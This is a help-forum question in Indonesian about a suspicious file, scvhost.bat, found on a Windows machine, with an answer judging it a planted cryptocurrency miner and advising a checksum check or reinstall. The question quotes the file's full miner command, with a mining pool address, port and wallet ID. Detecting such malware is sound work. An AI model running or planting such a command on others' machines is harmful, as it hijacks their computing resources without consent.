Saya baru saja menemukan file .bat ini yang bernama scvhost.bat. File memiliki konten ini di dalamnya:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
Apakah ini virus (untuk mencuri info dll) atau penambang yang ditanam? Saya khawatir karena saya juga mencoba-coba mata uang kripto dan stratum
merupakan mata uang yang disebutkan dalam file di atas.
windows
batch-file
malware
cryptomining
Program Pemula
sumber
sumber
Jawaban:
Tampaknya ini semacam penambang, terutama karena parameternya berisi URL ke kumpulan penambangan. Namun, Anda perlu memastikan apa yang ada dalam biner. Masuk akal untuk membandingkan checksum dari biner yang Anda temukan dari sistem Anda dengan rilis yang dibuat oleh tim pengembangan penambang. Jika mereka berbeda; anggap sistem Anda tidak aman.
Masalah lain adalah Anda mengetahui tentang penambang ini (mungkin karena menggunakan banyak CPU), tetapi Anda tidak tahu apa lagi yang terjadi pada sistem Anda. Jika penyusup bisa meluncurkan penambang, mereka bisa meluncurkan hal-hal lain juga. Mungkin ide yang baik untuk memulihkan dari cadangan atau melakukan instalasi baru.
sumber